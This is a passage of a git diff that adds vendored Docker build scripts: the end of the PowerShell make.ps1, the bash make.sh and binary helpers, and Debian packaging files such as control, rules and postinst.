+    $files=@(); $files = Invoke-Expression "git diff $upstreamCommit...$headCommit --diff-filter=ACMR --name-only -- `'pkg\*.go`'"
+    $badFiles=@(); $files | %{
+        $file=$_
+        # For the current changed file, get its list of dependencies, sorted and uniqued.
+        $imports = Invoke-Expression "go list -e -f `'{{ .Deps }}`' $file"
+        if ($LASTEXITCODE -ne 0) { Throw "Failed go list for dependencies on $file" }
+        $imports = $imports -Replace "\[" -Replace "\]", "" -Split(" ") | Sort-Object | Get-Unique
+        # Filter out what we are looking for
+        $imports = $imports -NotMatch "^github.com/docker/docker/pkg/" `
+                            -NotMatch "^github.com/docker/docker/vendor" `
+                            -Match "^github.com/docker/docker" `
+                            -Replace "`n", ""
+        $imports | % { $badFiles+="$file imports $_`n" }
+    }
+    if ($badFiles.Length -eq 0) {
+        Write-Host 'Congratulations!  ".\pkg\*.go" is safely isolated from internal code.'
+    } else {
+        $e = "`nThese files import internal code: (either directly or indirectly)`n"
+        $badFiles | %{ $e+=" - $_"}
+        Throw $e
+    }
+}
+
+# Validates that changed files are correctly go-formatted
+Function Validate-GoFormat($headCommit, $upstreamCommit) {
+    Write-Host "INFO: Validating go formatting on changed files..."
+
+    # Verify gofmt is installed
+    if ($(Get-Command gofmt -ErrorAction SilentlyContinue) -eq $nil) { Throw "gofmt does not appear to be installed" }
+
+    # Get a list of all go source-code files which have changed.  Ignore exit code on next call - always process regardless
+    $files=@(); $files = Invoke-Expression "git diff $upstreamCommit...$headCommit --diff-filter=ACMR --name-only -- `'*.go`'"
+    $files = $files | Select-String -NotMatch "^vendor/" | Select-String -NotMatch "^cli/compose/schema/bindata.go"
+    $badFiles=@(); $files | %{
+        # Deliberately ignore error on next line - treat as failed
+        $content=Invoke-Expression "git show $headCommit`:$_"
+
+        # Next set of hoops are to ensure we have LF not CRLF semantics as otherwise gofmt on Windows will not succeed.
+        # Also note that gofmt on Windows does not appear to support stdin piping correctly. Hence go through a temporary file.
+        $content=$content -join "`n"
+        $content+="`n"
+        $outputFile=[System.IO.Path]::GetTempFileName()
+        if (Test-Path $outputFile) { Remove-Item $outputFile }
+        [System.IO.File]::WriteAllText($outputFile, $content, (New-Object System.Text.UTF8Encoding($False)))
+        $valid=Invoke-Expression "gofmt -s -l $outputFile"
+        Write-Host "Checking $outputFile"
+        if ($valid.Length -ne 0) { $badFiles+=$_ }
+        if (Test-Path $outputFile) { Remove-Item $outputFile }
+    }
+    if ($badFiles.Length -eq 0) {
+        Write-Host 'Congratulations!  All Go source files are properly formatted.'
+    } else {
+        $e = "`nThese files are not properly gofmt`'d:`n"
+        $badFiles | %{ $e+=" - $_`n"}
+        $e+= "`nPlease reformat the above files using `"gofmt -s -w`" and commit the result."
+        Throw $e
+    }
+}
+
+# Run the unit tests
+Function Run-UnitTests() {
+    Write-Host "INFO: Running unit tests..."
+    $testPath="./..."
+    $goListCommand = "go list -e -f '{{if ne .Name """ + '\"github.com/docker/docker\"' + """}}{{.ImportPath}}{{end}}' $testPath"
+    $pkgList = $(Invoke-Expression $goListCommand)
+    if ($LASTEXITCODE -ne 0) { Throw "go list for unit tests failed" }
+    $pkgList = $pkgList | Select-String -Pattern "github.com/docker/docker"
+    $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/vendor"
+    $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/man"
+    $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/integration-cli"
+    $pkgList = $pkgList -replace "`r`n", " "
+    $goTestCommand = "go test" + $raceParm + " -cover -ldflags -w -tags """ + "autogen daemon" + """ -a """ + "-test.timeout=10m" + """ $pkgList"
+    Invoke-Expression $goTestCommand
+    if ($LASTEXITCODE -ne 0) { Throw "Unit tests failed" }
+}
+
+# Start of main code.
+Try {
+    Write-Host -ForegroundColor Cyan "INFO: make.ps1 starting at $(Get-Date)"
+    $root=$(pwd)
+
+    # Handle the "-All" shortcut to turn on all things we can handle.
+    if ($All) { $Client=$True; $Daemon=$True; $DCO=$True; $PkgImports=$True; $GoFormat=$True; $TestUnit=$True }
+
+    # Handle the "-Binary" shortcut to build both client and daemon.
+    if ($Binary) { $Client = $True; $Daemon = $True }
+
+    # Make sure we have something to do
+    if (-not($Client) -and -not($Daemon) -and -not($DCO) -and -not($PkgImports) -and -not($GoFormat) -and -not($TestUnit)) { Throw 'Nothing to do. Try adding "-All" for everything I can do' }
+
+    # Verify git is installed
+    if ($(Get-Command git -ErrorAction SilentlyContinue) -eq $nil) { Throw "Git does not appear to be installed" }
+
+    # Verify go is installed
+    if ($(Get-Command go -ErrorAction SilentlyContinue) -eq $nil) { Throw "GoLang does not appear to be installed" }
+
+    # Get the git commit. This will also verify if we are in a repo or not. Then add a custom string if supplied.
+    $gitCommit=Get-GitCommit
+    if ($CommitSuffix -ne "") { $gitCommit += "-"+$CommitSuffix -Replace ' ', '' }
+
+    # Get the version of docker (eg 1.14.0-dev)
+    $dockerVersion=Get-DockerVersion
+
+    # Give a warning if we are not running in a container and are building binaries or running unit tests.
+    # Not relevant for validation tests as these are fine to run outside of a container.
+    if ($Client -or $Daemon -or $TestUnit) { Check-InContainer }
+
+    # Verify GOPATH is set
+    if ($env:GOPATH.Length -eq 0) { Throw "Missing GOPATH environment variable. See https://golang.org/doc/code.html#GOPATH" }
+
+    # Run autogen if building binaries or running unit tests.
+    if ($Client -or $Daemon -or $TestUnit) {
+        Write-Host "INFO: Invoking autogen..."
+        Try { .\hack\make\.go-autogen.ps1 -CommitString $gitCommit -DockerVersion $dockerVersion }
+        Catch [Exception] { Throw $_ }
+    }
+
+    # DCO, Package import and Go formatting tests.
+    if ($DCO -or $PkgImports -or $GoFormat) {
+        # We need the head and upstream commits for these
+        $headCommit=Get-HeadCommit
+        $upstreamCommit=Get-UpstreamCommit
+
+        # Run DCO validation
+        if ($DCO) { Validate-DCO $headCommit $upstreamCommit }
+
+        # Run `gofmt` validation
+        if ($GoFormat) { Validate-GoFormat $headCommit $upstreamCommit }
+
+        # Run pkg isolation validation
+        if ($PkgImports) { Validate-PkgImports $headCommit $upstreamCommit }
+    }
+
+    # Build the binaries
+    if ($Client -or $Daemon) {
+        # Create the bundles directory if it doesn't exist
+        if (-not (Test-Path ".\bundles")) { New-Item ".\bundles" -ItemType Directory | Out-Null }
+
+        # Perform the actual build
+        if ($Daemon) { Execute-Build "daemon" "daemon" "dockerd" }
+        if ($Client) { Execute-Build "client" "" "docker" }
+    }
+
+    # Run unit tests
+    if ($TestUnit) { Run-UnitTests }
+
+    # Gratuitous ASCII art.
+    if ($Daemon -or $Client) {
+        Write-Host
+        Write-Host -ForegroundColor Green " ________   ____  __."
+        Write-Host -ForegroundColor Green " \_____  \ `|    `|/ _`|"
+        Write-Host -ForegroundColor Green " /   `|   \`|      `<"
+        Write-Host -ForegroundColor Green " /    `|    \    `|  \"
+        Write-Host -ForegroundColor Green " \_______  /____`|__ \"
+        Write-Host -ForegroundColor Green "         \/        \/"
+        Write-Host
+    }
+}
+Catch [Exception] {
+    Write-Host -ForegroundColor Red ("`nERROR: make.ps1 failed:`n$_")
+
+    # More gratuitous ASCII art.
+    Write-Host
+    Write-Host -ForegroundColor Red  "___________      .__.__             .___"
+    Write-Host -ForegroundColor Red  "\_   _____/____  `|__`|  `|   ____   __`| _/"
+    Write-Host -ForegroundColor Red  " `|    __) \__  \ `|  `|  `| _/ __ \ / __ `| "
+    Write-Host -ForegroundColor Red  " `|     \   / __ \`|  `|  `|_\  ___// /_/ `| "
+    Write-Host -ForegroundColor Red  " \___  /  (____  /__`|____/\___  `>____ `| "
+    Write-Host -ForegroundColor Red  "     \/        \/             \/     \/ "
+    Write-Host
+
+    Throw $_
+}
+Finally {
+    if ($global:pushed) { Pop-Location }
+    Write-Host -ForegroundColor Cyan "INFO: make.ps1 ended at $(Get-Date)"
+}
diff --git a/vendor/github.com/docker/docker/hack/make.sh b/vendor/github.com/docker/docker/hack/make.sh
new file mode 100755
index 0000000000..f0e482feda
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make.sh
@@ -0,0 +1,304 @@
+#!/usr/bin/env bash
+set -e
+
+# This script builds various binary artifacts from a checkout of the docker
+# source code.
+#
+# Requirements:
+# - The current directory should be a checkout of the docker source code
+#   (https://github.com/docker/docker). Whatever version is checked out
+#   will be built.
+# - The VERSION file, at the root of the repository, should exist, and
+#   will be used as Docker binary version and package version.
+# - The hash of the git commit will also be included in the Docker binary,
+#   with the suffix -unsupported if the repository isn't clean.
+# - The script is intended to be run inside the docker container specified
+#   in the Dockerfile at the root of the source. In other words:
+#   DO NOT CALL THIS SCRIPT DIRECTLY.
+# - The right way to call this script is to invoke "make" from
+#   your checkout of the Docker repository.
+#   the Makefile will do a "docker build -t docker ." and then
+#   "docker run hack/make.sh" in the resulting image.
+#
+
+set -o pipefail
+
+export DOCKER_PKG='github.com/docker/docker'
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+export MAKEDIR="$SCRIPTDIR/make"
+export PKG_CONFIG=${PKG_CONFIG:-pkg-config}
+
+# We're a nice, sexy, little shell script, and people might try to run us;
+# but really, they shouldn't. We want to be in a container!
+inContainer="AssumeSoInitially"
+if [ "$(go env GOHOSTOS)" = 'windows' ]; then
+	if [ -z "$FROM_DOCKERFILE" ]; then
+		unset inContainer
+	fi
+else
+	if [ "$PWD" != "/go/src/$DOCKER_PKG" ] || [ -z "$DOCKER_CROSSPLATFORMS" ]; then
+		unset inContainer
+	fi
+fi
+
+if [ -z "$inContainer" ]; then
+	{
+		echo "# WARNING! I don't seem to be running in a Docker container."
+		echo "# The result of this command might be an incorrect build, and will not be"
+		echo "# officially supported."
+		echo "#"
+		echo "# Try this instead: make all"
+		echo "#"
+	} >&2
+fi
+
+echo
+
+# List of bundles to create when no argument is passed
+DEFAULT_BUNDLES=(
+	binary-client
+	binary-daemon
+	dynbinary
+
+	test-unit
+	test-integration-cli
+	test-docker-py
+
+	cross
+	tgz
+)
+
+VERSION=$(< ./VERSION)
+! BUILDTIME=$(date --rfc-3339 ns 2> /dev/null | sed -e 's/ /T/')
+if command -v git &> /dev/null && [ -d .git ] && git rev-parse &> /dev/null; then
+	GITCOMMIT=$(git rev-parse --short HEAD)
+	if [ -n "$(git status --porcelain --untracked-files=no)" ]; then
+		GITCOMMIT="$GITCOMMIT-unsupported"
+		echo "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
+		echo "# GITCOMMIT = $GITCOMMIT"
+		echo "# The version you are building is listed as unsupported because"
+		echo "# there are some files in the git repository that are in an uncommitted state."
+		echo "# Commit these changes, or add to .gitignore to remove the -unsupported from the version."
+		echo "# Here is the current list:"
+		git status --porcelain --untracked-files=no
+		echo "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
+	fi
+elif [ "$DOCKER_GITCOMMIT" ]; then
+	GITCOMMIT="$DOCKER_GITCOMMIT"
+else
+	echo >&2 'error: .git directory missing and DOCKER_GITCOMMIT not specified'
+	echo >&2 '  Please either build with the .git directory accessible, or specify the'
+	echo >&2 '  exact (--short) commit hash you are building using DOCKER_GITCOMMIT for'
+	echo >&2 '  future accountability in diagnosing build issues.  Thanks!'
+	exit 1
+fi
+
+if [ "$AUTO_GOPATH" ]; then
+	rm -rf .gopath
+	mkdir -p .gopath/src/"$(dirname "${DOCKER_PKG}")"
+	ln -sf ../../../.. .gopath/src/"${DOCKER_PKG}"
+	export GOPATH="${PWD}/.gopath"
+
+	if [ "$(go env GOOS)" = 'solaris' ]; then
+		# sys/unix is installed outside the standard library on solaris
+		# TODO need to allow for version change, need to get version from go
+		export GO_VERSION=${GO_VERSION:-"1.7.1"}
+		export GOPATH="${GOPATH}:/usr/lib/gocode/${GO_VERSION}"
+	fi
+fi
+
+if [ ! "$GOPATH" ]; then
+	echo >&2 'error: missing GOPATH; please see https://golang.org/doc/code.html#GOPATH'
+	echo >&2 '  alternatively, set AUTO_GOPATH=1'
+	exit 1
+fi
+
+DOCKER_BUILDTAGS+=" daemon"
+if ${PKG_CONFIG} 'libsystemd >= 209' 2> /dev/null ; then
+	DOCKER_BUILDTAGS+=" journald"
+elif ${PKG_CONFIG} 'libsystemd-journal' 2> /dev/null ; then
+	DOCKER_BUILDTAGS+=" journald journald_compat"
+fi
+
+# test whether "btrfs/version.h" exists and apply btrfs_noversion appropriately
+if \
+	command -v gcc &> /dev/null \
+	&& ! gcc -E - -o /dev/null &> /dev/null <<<'#include <btrfs/version.h>' \
+; then
+	DOCKER_BUILDTAGS+=' btrfs_noversion'
+fi
+
+# test whether "libdevmapper.h" is new enough to support deferred remove
+# functionality.
+if \
+	command -v gcc &> /dev/null \
+	&& ! ( echo -e  '#include <libdevmapper.h>\nint main() { dm_task_deferred_remove(NULL); }'| gcc -xc - -o /dev/null -ldevmapper &> /dev/null ) \
+; then
+       DOCKER_BUILDTAGS+=' libdm_no_deferred_remove'
+fi
+
+# Use these flags when compiling the tests and final binary
+
+IAMSTATIC='true'
+source "$SCRIPTDIR/make/.go-autogen"
+if [ -z "$DOCKER_DEBUG" ]; then
+	LDFLAGS='-w'
+fi
+
+LDFLAGS_STATIC=''
+EXTLDFLAGS_STATIC='-static'
+# ORIG_BUILDFLAGS is necessary for the cross target which cannot always build
+# with options like -race.
+ORIG_BUILDFLAGS=( -tags "autogen netgo static_build sqlite_omit_load_extension $DOCKER_BUILDTAGS" -installsuffix netgo )
+# see https://github.com/golang/go/issues/9369#issuecomment-69864440 for why -installsuffix is necessary here
+
+# When $DOCKER_INCREMENTAL_BINARY is set in the environment, enable incremental
+# builds by installing dependent packages to the GOPATH.
+REBUILD_FLAG="-a"
+if [ "$DOCKER_INCREMENTAL_BINARY" ]; then
+	REBUILD_FLAG="-i"
+fi
+ORIG_BUILDFLAGS+=( $REBUILD_FLAG )
+
+BUILDFLAGS=( $BUILDFLAGS "${ORIG_BUILDFLAGS[@]}" )
+# Test timeout.
+
+if [ "${DOCKER_ENGINE_GOARCH}" == "arm" ]; then
+	: ${TIMEOUT:=10m}
+elif [ "${DOCKER_ENGINE_GOARCH}" == "windows" ]; then
+	: ${TIMEOUT:=8m}
+else
+	: ${TIMEOUT:=5m}
+fi
+
+LDFLAGS_STATIC_DOCKER="
+	$LDFLAGS_STATIC
+	-extldflags \"$EXTLDFLAGS_STATIC\"
+"
+
+if [ "$(uname -s)" = 'FreeBSD' ]; then
+	# Tell cgo the compiler is Clang, not GCC
+	# https://code.google.com/p/go/source/browse/src/cmd/cgo/gcc.go?spec=svne77e74371f2340ee08622ce602e9f7b15f29d8d3&r=e6794866ebeba2bf8818b9261b54e2eef1c9e588#752
+	export CC=clang
+
+	# "-extld clang" is a workaround for
+	# https://code.google.com/p/go/issues/detail?id=6845
+	LDFLAGS="$LDFLAGS -extld clang"
+fi
+
+# If sqlite3.h doesn't exist under /usr/include,
+# check /usr/local/include also just in case
+# (e.g. FreeBSD Ports installs it under the directory)
+if [ ! -e /usr/include/sqlite3.h ] && [ -e /usr/local/include/sqlite3.h ]; then
+	export CGO_CFLAGS='-I/usr/local/include'
+	export CGO_LDFLAGS='-L/usr/local/lib'
+fi
+
+HAVE_GO_TEST_COVER=
+if \
+	go help testflag | grep -- -cover > /dev/null \
+	&& go tool -n cover > /dev/null 2>&1 \
+; then
+	HAVE_GO_TEST_COVER=1
+fi
+
+# a helper to provide ".exe" when it's appropriate
+binary_extension() {
+	if [ "$(go env GOOS)" = 'windows' ]; then
+		echo -n '.exe'
+	fi
+}
+
+hash_files() {
+	while [ $# -gt 0 ]; do
+		f="$1"
+		shift
+		dir="$(dirname "$f")"
+		base="$(basename "$f")"
+		for hashAlgo in md5 sha256; do
+			if command -v "${hashAlgo}sum" &> /dev/null; then
+				(
+					# subshell and cd so that we get output files like:
+					#   $HASH docker-$VERSION
+					# instead of:
+					#   $HASH /go/src/github.com/.../$VERSION/binary/docker-$VERSION
+					cd "$dir"
+					"${hashAlgo}sum" "$base" > "$base.$hashAlgo"
+				)
+			fi
+		done
+	done
+}
+
+bundle() {
+	local bundle="$1"; shift
+	echo "---> Making bundle: $(basename "$bundle") (in $DEST)"
+	source "$SCRIPTDIR/make/$bundle" "$@"
+}
+
+copy_binaries() {
+	dir="$1"
+	# Add nested executables to bundle dir so we have complete set of
+	# them available, but only if the native OS/ARCH is the same as the
+	# OS/ARCH of the build target
+	if [ "$(go env GOOS)/$(go env GOARCH)" == "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then
+		if [ -x /usr/local/bin/docker-runc ]; then
+			echo "Copying nested executables into $dir"
+			for file in containerd containerd-shim containerd-ctr runc init proxy; do
+				cp `which "docker-$file"` "$dir/"
+				if [ "$2" == "hash" ]; then
+					hash_files "$dir/docker-$file"
+				fi
+			done
+		fi
+	fi
+}
+
+install_binary() {
+	file="$1"
+	target="${DOCKER_MAKE_INSTALL_PREFIX:=/usr/local}/bin/"
+	if [ "$(go env GOOS)" == "linux" ]; then
+		echo "Installing $(basename $file) to ${target}"
+		cp -L "$file" "$target"
+	else
+		echo "Install is only supported on linux"
+		return 1
+	fi
+}
+
+main() {
+	# We want this to fail if the bundles already exist and cannot be removed.
+	# This is to avoid mixing bundles from different versions of the code.
+	mkdir -p bundles
+	if [ -e "bundles/$VERSION" ] && [ -z "$KEEPBUNDLE" ]; then
+		echo "bundles/$VERSION already exists. Removing."
+		rm -fr "bundles/$VERSION" && mkdir "bundles/$VERSION" || exit 1
+		echo
+	fi
+
+	if [ "$(go env GOHOSTOS)" != 'windows' ]; then
+		# Windows and symlinks don't get along well
+
+		rm -f bundles/latest
+		ln -s "$VERSION" bundles/latest
+	fi
+
+	if [ $# -lt 1 ]; then
+		bundles=(${DEFAULT_BUNDLES[@]})
+	else
+		bundles=($@)
+	fi
+	for bundle in ${bundles[@]}; do
+		export DEST="bundles/$VERSION/$(basename "$bundle")"
+		# Cygdrive paths don't play well with go build -o.
+		if [[ "$(uname -s)" == CYGWIN* ]]; then
+			export DEST="$(cygpath -mw "$DEST")"
+		fi
+		mkdir -p "$DEST"
+		ABS_DEST="$(cd "$DEST" && pwd -P)"
+		bundle "$bundle"
+		echo
+	done
+}
+
+main "$@"
diff --git a/vendor/github.com/docker/docker/hack/make/.binary b/vendor/github.com/docker/docker/hack/make/.binary
new file mode 100644
index 0000000000..f5c35c3b7e
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.binary
@@ -0,0 +1,48 @@
+#!/bin/bash
+set -e
+
+BINARY_NAME="$BINARY_SHORT_NAME-$VERSION"
+BINARY_EXTENSION="$(binary_extension)"
+BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION"
+
+source "${MAKEDIR}/.go-autogen"
+
+(
+export GOGC=${DOCKER_BUILD_GOGC:-1000}
+
+if [ "$(go env GOOS)/$(go env GOARCH)" != "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then
+	# must be cross-compiling!
+	case "$(go env GOOS)/$(go env GOARCH)" in
+		windows/amd64)
+			export CC=x86_64-w64-mingw32-gcc
+			export CGO_ENABLED=1
+			;;
+	esac
+fi
+
+if [ "$IAMSTATIC" == "true" ] && [ "$(go env GOHOSTOS)" == "linux" ]; then
+	if  [ "${GOOS}/${GOARCH}" == "darwin/amd64" ]; then
+		export CGO_ENABLED=1
+		export CC=o64-clang
+		export LDFLAGS='-linkmode external -s'
+		export LDFLAGS_STATIC_DOCKER='-extld='${CC}
+	else
+		export BUILDFLAGS=( "${BUILDFLAGS[@]/pkcs11 /}" ) # we cannot dlopen in pkcs11 in a static binary
+	fi
+fi
+
+echo "Building: $DEST/$BINARY_FULLNAME"
+go build \
+	-o "$DEST/$BINARY_FULLNAME" \
+	"${BUILDFLAGS[@]}" \
+	-ldflags "
+		$LDFLAGS
+		$LDFLAGS_STATIC_DOCKER
+	" \
+	$GO_PACKAGE
+)
+
+echo "Created binary: $DEST/$BINARY_FULLNAME"
+ln -sf "$BINARY_FULLNAME" "$DEST/$BINARY_SHORT_NAME$BINARY_EXTENSION"
+
+hash_files "$DEST/$BINARY_FULLNAME"
diff --git a/vendor/github.com/docker/docker/hack/make/.binary-setup b/vendor/github.com/docker/docker/hack/make/.binary-setup
new file mode 100644
index 0000000000..b9f8ce2517
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.binary-setup
@@ -0,0 +1,10 @@
+#!/bin/bash
+
+DOCKER_CLIENT_BINARY_NAME='docker'
+DOCKER_DAEMON_BINARY_NAME='dockerd'
+DOCKER_RUNC_BINARY_NAME='docker-runc'
+DOCKER_CONTAINERD_BINARY_NAME='docker-containerd'
+DOCKER_CONTAINERD_CTR_BINARY_NAME='docker-containerd-ctr'
+DOCKER_CONTAINERD_SHIM_BINARY_NAME='docker-containerd-shim'
+DOCKER_PROXY_BINARY_NAME='docker-proxy'
+DOCKER_INIT_BINARY_NAME='docker-init'
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/compat b/vendor/github.com/docker/docker/hack/make/.build-deb/compat
new file mode 100644
index 0000000000..ec635144f6
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/compat
@@ -0,0 +1 @@
+9
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/control b/vendor/github.com/docker/docker/hack/make/.build-deb/control
new file mode 100644
index 0000000000..0f5439947c
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/control
@@ -0,0 +1,29 @@
+Source: docker-engine
+Section: admin
+Priority: optional
+Maintainer: Docker <support@docker.com>
+Standards-Version: 3.9.6
+Homepage: https://dockerproject.org
+Vcs-Browser: https://github.com/docker/docker
+Vcs-Git: git://github.com/docker/docker.git
+
+Package: docker-engine
+Architecture: linux-any
+Depends: iptables, ${misc:Depends}, ${perl:Depends}, ${shlibs:Depends}
+Recommends: aufs-tools,
+            ca-certificates,
+            cgroupfs-mount | cgroup-lite,
+            git,
+            xz-utils,
+            ${apparmor:Recommends}
+Conflicts: docker (<< 1.5~), docker.io, lxc-docker, lxc-docker-virtual-package, docker-engine-cs
+Description: Docker: the open-source application container engine
+ Docker is an open source project to build, ship and run any application as a
+ lightweight container
+ .
+ Docker containers are both hardware-agnostic and platform-agnostic. This means
+ they can run anywhere, from your laptop to the largest EC2 compute instance and
+ everything in between - and they don't require you to use a particular
+ language, framework or packaging system. That makes them great building blocks
+ for deploying and scaling web apps, databases, and backend services without
+ depending on a particular stack or provider.
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion
new file mode 100644
index 0000000000..6ea1119308
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion
@@ -0,0 +1 @@
+contrib/completion/bash/docker
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default
new file mode 120000
index 0000000000..4278533d65
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default
@@ -0,0 +1 @@
+../../../contrib/init/sysvinit-debian/docker.default
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init
new file mode 120000
index 0000000000..8cb89d30dd
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init
@@ -0,0 +1 @@
+../../../contrib/init/sysvinit-debian/docker
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart
new file mode 120000
index 0000000000..7e1b64a3e6
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart
@@ -0,0 +1 @@
+../../../contrib/init/upstart/docker.conf
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install
new file mode 100644
index 0000000000..dc6b25f04f
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install
@@ -0,0 +1,12 @@
+#contrib/syntax/vim/doc/* /usr/share/vim/vimfiles/doc/
+#contrib/syntax/vim/ftdetect/* /usr/share/vim/vimfiles/ftdetect/
+#contrib/syntax/vim/syntax/* /usr/share/vim/vimfiles/syntax/
+contrib/*-integration usr/share/docker-engine/contrib/
+contrib/check-config.sh usr/share/docker-engine/contrib/
+contrib/completion/fish/docker.fish usr/share/fish/vendor_completions.d/
+contrib/completion/zsh/_docker usr/share/zsh/vendor-completions/
+contrib/init/systemd/docker.service lib/systemd/system/
+contrib/init/systemd/docker.socket lib/systemd/system/
+contrib/mk* usr/share/docker-engine/contrib/
+contrib/nuke-graph-directory.sh usr/share/docker-engine/contrib/
+contrib/syntax/nano/Dockerfile.nanorc usr/share/nano/
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages
new file mode 100644
index 0000000000..1aa62186a6
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages
@@ -0,0 +1 @@
+man/man*/*
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst
new file mode 100644
index 0000000000..eeef6ca801
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst
@@ -0,0 +1,20 @@
+#!/bin/sh
+set -e
+
+case "$1" in
+	configure)
+		if [ -z "$2" ]; then
+			if ! getent group docker > /dev/null; then
+				groupadd --system docker
+			fi
+		fi
+		;;
+	abort-*)
+		# How'd we get here??
+		exit 1
+		;;
+	*)
+		;;
+esac
+
+#DEBHELPER#
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev
new file mode 120000
index 0000000000..914a361959
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev
@@ -0,0 +1 @@
+../../../contrib/udev/80-docker.rules
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docs b/vendor/github.com/docker/docker/hack/make/.build-deb/docs
new file mode 100644
index 0000000000..b43bf86b50
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docs
@@ -0,0 +1 @@
+README.md
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/rules b/vendor/github.com/docker/docker/hack/make/.build-deb/rules
new file mode 100755
index 0000000000..6522103e5d
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-deb/rules
@@ -0,0 +1,55 @@
+#!/usr/bin/make -f
+
+VERSION = $(shell cat VERSION)
+SYSTEMD_VERSION := $(shell dpkg-query -W -f='$${Version}\n' systemd | cut -d- -f1)
+SYSTEMD_GT_227 := $(shell [ '$(SYSTEMD_VERSION)' ] && [ '$(SYSTEMD_VERSION)' -gt 227 ] && echo true )
+
+override_dh_gencontrol:
+	# if we're on Ubuntu, we need to Recommends: apparmor
+	echo 'apparmor:Recommends=$(shell dpkg-vendor --is Ubuntu && echo apparmor)' >> debian/docker-engine.substvars
+	dh_gencontrol
+
+override_dh_auto_build:
+	./hack/make.sh dynbinary
+	# ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here
+
+override_dh_auto_test:
+	./bundles/$(VERSION)/dynbinary-daemon/dockerd -v
+	./bundles/$(VERSION)/dynbinary-client/docker -v
+
+override_dh_strip:
+	# Go has lots of problems with stripping, so just don't
+
+override_dh_auto_install:
+	mkdir -p debian/docker-engine/usr/bin
+	cp -aT "$$(readlink -f bundles/$(VERSION)/dynbinary-client/docker)" debian/docker-engine/usr/bin/docker
+	cp -aT "$$(readlink -f bundles/$(VERSION)/dynbinary-daemon/dockerd)" debian/docker-engine/usr/bin/dockerd
+	cp -aT /usr/local/bin/docker-proxy debian/docker-engine/usr/bin/docker-proxy
+	cp -aT /usr/local/bin/docker-containerd debian/docker-engine/usr/bin/docker-containerd
+	cp -aT /usr/local/bin/docker-containerd-shim debian/docker-engine/usr/bin/docker-containerd-shim
+	cp -aT /usr/local/bin/docker-containerd-ctr debian/docker-engine/usr/bin/docker-containerd-ctr
+	cp -aT /usr/local/bin/docker-runc debian/docker-engine/usr/bin/docker-runc
+	cp -aT /usr/local/bin/docker-init debian/docker-engine/usr/bin/docker-init
+	mkdir -p debian/docker-engine/usr/lib/docker
+
+override_dh_installinit:
+	# use "docker" as our service name, not "docker-engine"
+	dh_installinit --name=docker
+ifeq (true, $(SYSTEMD_GT_227))
+	$(warning "Setting TasksMax=infinity")
+	sed -i -- 's/#TasksMax=infinity/TasksMax=infinity/' debian/docker-engine/lib/systemd/system/docker.service
+endif
+
+override_dh_installudev:
+	# match our existing priority
+	dh_installudev --priority=z80
+
+override_dh_install:
+	dh_install
+	dh_apparmor --profile-name=docker-engine -pdocker-engine
+
+override_dh_shlibdeps:
+	dh_shlibdeps --dpkg-shlibdeps-params=--ignore-missing-info
+
+%:
+	dh $@ --with=bash-completion $(shell command -v dh_systemd_enable > /dev/null 2>&1 && echo --with=systemd)
diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec
new file mode 100644
index 0000000000..ae597bd774
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec
